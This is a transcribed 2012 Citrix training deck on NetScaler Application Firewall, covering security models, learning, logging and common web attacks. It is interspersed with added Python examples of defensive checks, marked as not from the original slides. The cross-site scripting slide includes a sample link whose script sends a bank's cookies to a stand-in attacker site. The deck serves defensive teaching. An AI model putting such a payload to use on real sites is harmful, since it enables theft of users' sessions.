Protect your data from web-based attacks with NetScaler Application Firewall Rónán O’Brien Senior Support Readiness May 2012

Page 1:

Protect your data from web-based attacks with NetScaler Application Firewall

Rónán O’Brien, Senior Support Readiness

May 2012

Page 2:

Agenda

• Application Firewalls
• Security Models
• Application Firewall Wizard
• Attack Examples
• Learning
• Logging
• Deployment checklist

Page 3:

Application Firewalls

Page 4:

Application Firewalls

• Application implies Layer 7
• Not to be confused with Network Firewalls
• Application Firewalls vs Deep Packet Inspection (DPI)
• SSL Offload
• XML Aware
• Payment Card Industry Data Security Standard (PCI-DSS)

Page 5:

us-cert.gov

• Some vulnerability and attack reports can be found on www.us-cert.com
• Operational arm of the National Cyber Security Division (NCSD) at the Department of Homeland Security (DHS).

Page 6:

Application Firewall citrix.com site

Page 7:

Traffic Flow Architecture

[Diagram: Client IP → VIP (Vserver A) → SNIP → Server1 IP / Server2 IP / Server3 IP]

Page 8:

Lab Structure

• Self contained labs – cloud hosted.
• Go to http://training.citrixsynergy.net and enter the course code and your business e-mail address.
• Course code: SanFran

Page 9:

Lab Structure

• Click to open Web Interface, where you can launch published XenCenter.
• The digital lab guide is here.
• Limited printed copies available.

Page 10:

LABS 1 & 2

Page 11:

Security Models

Page 12:

Security Models

• Positive Security Model – allow only known good traffic
• Negative Security Model – block only known bad traffic

Page 13:

Security Models

• NetScaler provides both models
• Positive and Negative use cases
• Signatures available for download
• Learning makes the positive security model easier to configure

Page 14:

Application Firewall Actions - Blocking

• A request side block results in one of:
  1. Redirect to the root of the website (/) – default.
  2. Redirect to a URL of your choice (relative or absolute).
  3. Custom error page served from the appliance.
  4. Transform.
• A response side block results in:
  ○ Termination of the response.
  ○ X-Out of sensitive data.

Page 15:

Application Firewall Actions - Logging

• Every block action will be logged.
• We can choose not to block, but still log the violation.
• We can create ‘relaxations’ directly from the logs.
• Logging is on the appliance, or can be sent to a 3rd party.
• Logging is in Syslog format and, as of NetScaler 10, CEF format.

Page 16:

Application Firewall Actions - Stat

• NetScaler AppFirewall will collect stats on violations.
• Reporting is on the appliance.
• Reporting can also be performed by a 3rd party (e.g. Splunk or Citrix Command Center).

Page 17:

Application Firewall Actions - Learn

• NetScaler App Firewall has built-in learning intelligence.
• Creates the Regex rule – so you don’t have to!
• For scale (when thousands of learned rules are presented), we use the Visualizer.

Page 18:

Application Firewall Wizard

Page 19:

Application Firewall Wizard

• Can be used to modify configs previously created by the wizard.
• One stop shop for configuring Application Firewall.
• Positive and Negative security models.
• Deep Protections.
• Also integrates with Learning.

Page 20:

Application Firewall Wizard

Page 21:

Lab 3 & 4

Page 22:

Attack Examples

Page 23:

Forceful Browsing

• Experienced internet\application users
• Predictable file system layout
• Lack of Web Server security (directory browsing not disabled)
• Reconnaissance
• Site may be used as an attack platform (but otherwise left untouched)

Page 24:

URL Closure

[Diagram: the page served by the site contains <A Href="headline1.htm"><A Href="headline2.htm"><A Href="headline3.htm">; the client then requests a URL that no served page linked to:]

GET headline4.htm
Host: newstimes.com
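Added example, not from the presentation or from NetScaler itself: a minimal per-session URL closure check in Python, fed the newstimes.com page above as constructed input. The class name, the start-URL list and the "allow"/"block" results are assumptions for illustration.

```python
import re
from urllib.parse import urljoin, urlsplit

# Anchors in a served page, e.g. <A Href="headline1.htm"> (matched case-insensitively).
HREF_RE = re.compile(r'<a\s[^>]*?href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

class UrlClosure:
    """Per-session URL closure (hypothetical name): a request is allowed only if
    its path is a configured start URL or was linked from a page this session
    has already been served. Anything else is forceful browsing and is blocked."""

    def __init__(self, start_urls):
        self.start_urls = set(start_urls)   # e.g. {"/"} for the site root
        self.allowed = set()                # paths discovered in served pages

    def observe_response(self, page_url, html):
        """Response side: every link on a served page becomes a permitted next request."""
        for href in HREF_RE.findall(html):
            self.allowed.add(urlsplit(urljoin(page_url, href)).path)

    def check_request(self, path):
        """Request side: returns 'allow' or 'block' for the requested path."""
        if path in self.start_urls or path in self.allowed:
            return "allow"
        return "block"   # never linked to: a violation to log and block

# Constructed sample matching the slide: the front page links only headlines 1-3.
FRONT_PAGE = ('<A Href="headline1.htm"><A Href="headline2.htm">'
              '<A Href="headline3.htm">')

def demo():
    session = UrlClosure(start_urls=["/"])
    results = [session.check_request("/")]                      # start URL
    session.observe_response("http://newstimes.com/", FRONT_PAGE)
    results.append(session.check_request("/headline2.htm"))     # linked from the page
    results.append(session.check_request("/headline4.htm"))     # the GET from the slide
    return results

if __name__ == "__main__":
    print(demo())   # ['allow', 'allow', 'block']
```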

Page 25:

Lab 5

Page 26:

SQL Injection

• Uses SQL logic and a vulnerable web form to extract information from the database.
• Does not impact or violate the web server, but results in unauthorised access to data.
• Adds an additional SQL command to a non-validated form field.

Page 27:

SQL Injection Custom Actions

• Violation actions include allowing the request to continue after neutralising the attack.
• SQL comments can be used to get around basic string scanning protection.

Page 28:

Lab 6

Page 29:

Cross Site Scripting

• Tricking a browser into executing a malicious script.
• Can be dynamic or static.

[Diagram]
1. Customer logs into onlinebank.com.
2. Malicious user sends an e-mail to the customer with an HTTP link, which the user clicks on:
   http://www.onlinebank.com/login.jsp?name=<script>Send cookies to http://piratesite.net</script>
3. onlinebank.com cookies (carried off by the script).

Page 30:

Lab 7

Page 31:

Application Vulnerability Scans

• Security companies offer an automated scan to test for known vulnerabilities.
• Scanning is usually performed on a continual basis as
  ○ the application itself is changed\developed
  ○ new attack methods & vulnerabilities are discovered.
• NetScaler Application Firewall understands the scan report & suggests the necessary protections to close the security holes.

Page 32:

Lab 8

Page 33:

Form Field Consistency

• Attack method: Client-side modification of form properties.
• Vulnerability: Client input not validated.
• Result: Compromise of application logic.
• Hidden form elements (e.g. prices)
• Form structure – e.g. radio buttons, check boxes etc.

Page 34:

Lab 9

Page 35:

Protecting Application Cookies

• Cookies are Web Application\Web Server identity tokens.
• Session vs Persistent
• Name value configuration
• Application Firewall Cookie ‘proactive’ Actions include encrypting and proxying cookies (next).
• If a cookie is tampered with, the action is to block.

Page 36:

Cookie Encryption & Decryption

Response (server → AppFw → client):  Set-Cookie: user=bob  →  Set-Cookie: user=KLJDG84NMRG
Request (client → AppFw → server):   Cookie: user=KLJDG84NMRG  →  Cookie: user=bob

Page 37:

Cookie Proxying

Response (server → AppFw → client):  Set-Cookie: user=bob + Set-Cookie: access=limited  →  Set-Cookie: AppfwCookieJar=H77HFDSH908
Request (client → AppFw → server):   Cookie: AppfwCookieJar=H77HFDSH908  →  Cookie: user=bob + Cookie: access=limited
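Added example, not from the presentation or from NetScaler itself: the cookie proxying exchange above implemented in Python as a response-side and a request-side rewrite, with the jar id kept deterministic for the demo. The class name, the HttpOnly flag on the jar cookie and the block-on-unknown-jar behaviour are assumptions for illustration.

```python
import secrets
from http.cookies import SimpleCookie

class CookieProxy:
    """Cookie proxying (hypothetical class name): application cookies stay on the
    firewall; the client only ever receives one opaque jar id, so it can neither
    read nor tamper with the real values."""

    def __init__(self, token_factory=lambda: secrets.token_hex(16)):
        self.jars = {}                      # jar id -> {cookie name: value}
        self.token_factory = token_factory  # injectable so the demo is deterministic

    def rewrite_response(self, set_cookie_headers):
        """Response side: swallow the server's Set-Cookie headers and return the
        single Set-Cookie the client gets instead."""
        jar = {}
        for header in set_cookie_headers:
            parsed = SimpleCookie()
            parsed.load(header)
            for name, morsel in parsed.items():
                jar[name] = morsel.value
        token = self.token_factory()
        self.jars[token] = jar
        return [f"AppfwCookieJar={token}; HttpOnly"]

    def rewrite_request(self, cookie_header):
        """Request side: returns ('allow', restored Cookie header), or ('block', None)
        when the jar id is unknown, i.e. forged or tampered with."""
        parsed = SimpleCookie()
        parsed.load(cookie_header)
        if "AppfwCookieJar" not in parsed:
            return ("allow", None)          # first request: nothing to restore yet
        jar = self.jars.get(parsed["AppfwCookieJar"].value)
        if jar is None:
            return ("block", None)
        return ("allow", "; ".join(f"{k}={v}" for k, v in jar.items()))

def demo():
    proxy = CookieProxy(token_factory=lambda: "H77HFDSH908")   # fixed id from the slide
    to_client = proxy.rewrite_response(["user=bob", "access=limited"])
    to_server = proxy.rewrite_request("AppfwCookieJar=H77HFDSH908")
    forged = proxy.rewrite_request("AppfwCookieJar=H77HFDSH909")  # constructed tamper
    return to_client, to_server, forged
```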

Page 38:

Lab 10

Page 39:

Learning

Page 40:

Learning

Learned data
• is used to create rules for the positive security model.
• can be exported to a CSV for analysis.
• is propagated in an HA pair of appliances.
• is stored in RegEx format.
• should not be gathered indefinitely: learning should not be left permanently turned on in production.

Page 41:

Lab 11

Page 42:

HTML Comment Stripping

• Programming comments:

  <!-- This is a comment. Comments are not displayed in the browser
       but may contain all sorts of temporary information -->

• Some scripts include comments:

  <script type="text/javascript">
  <!--
  function displayMsg() {
    alert("Hello World!");
  }
  //-->
  </script>
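Added example, not from the presentation or from NetScaler itself: a response-side comment-stripping transform in Python that removes developer comments from the markup but leaves <script> blocks untouched, so the <!-- ... //--> hiding idiom shown above keeps working. The function name, the choice to skip script blocks entirely and the sample page are assumptions for illustration.

```python
import re

# Script blocks are kept intact: the <!-- ... //--> inside them belongs to the
# script's own hiding idiom and is not a developer note.
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)
COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)

def strip_html_comments(html):
    """Remove HTML comments from markup while leaving <script> blocks verbatim."""
    out, pos = [], 0
    for m in SCRIPT_RE.finditer(html):
        out.append(COMMENT_RE.sub("", html[pos:m.start()]))  # markup before the script
        out.append(m.group(0))                                # script block, untouched
        pos = m.end()
    out.append(COMMENT_RE.sub("", html[pos:]))                # trailing markup
    return "".join(out)

# Constructed sample page in the spirit of the slide: a leftover developer note
# plus a script that hides itself from old browsers with an HTML comment.
SAMPLE = """<html><body>
<!-- TODO: remove before go-live, staging DB is db-staging.internal -->
<p>Hello</p>
<script type="text/javascript">
<!--
function displayMsg() { alert("Hello World!") }
//-->
</script>
</body></html>"""

def demo():
    return strip_html_comments(SAMPLE)
```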

Page 43:

Lab 12

Page 44:

Deployment points to bear in mind

Page 45:

Before Turning on Application Firewall

• Sizing – look at the web application logs & response sizes.
• Decide which parts of the application need to be protected, and whether they require different levels of protection.
• Some protections are more resource intensive than others.
• Clever usage of policies and ACLs can allow only specific groups access to the application, to fill the learning DB with valid traffic patterns.

Page 46:

Before you leave…

• Conference surveys are available online at www.citrixsummit.com starting Thursday, May 10
  ○ Provide your feedback and pick up a complimentary gift at the registration desk
• Download presentations starting Monday, May 21, from your My Organizer tool located in your My Account

Page 47:

We value your feedback! Take a survey of this session now in the mobile app

• Click 'Sessions' button

• Click on today's tab

• Find this session

• Click 'Surveys'
